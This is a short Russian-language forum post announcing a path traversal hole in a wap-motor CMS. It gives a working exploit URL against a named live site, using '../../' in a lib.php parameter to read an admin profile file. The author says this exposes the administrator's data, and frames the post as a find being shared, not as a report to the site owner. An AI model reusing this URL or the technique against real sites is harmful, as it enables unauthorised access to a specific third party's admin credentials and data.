Версию этого wap-motor'а незнаю, и возможно я уже не первый её нахожу, но сегодня я все же её нашел на сайте tumak.h2m.ru а то что там стоит wap-motor я не сомневаюсь.

Вот собственно дыра:
http://tumak.h2m.ru/library/lib.php?did=css&a[0]=../../local/profil/tumak.prof

Собственно мы видим все данные админа сайта. На оффициальном проекте этого мотора http://visavi.net данной уязвимости нет, так что я думаю она есть не во всех версиях.

Прошу на меня не злится если кто то уже находил такую дыру, специально искал в гугле и ненашел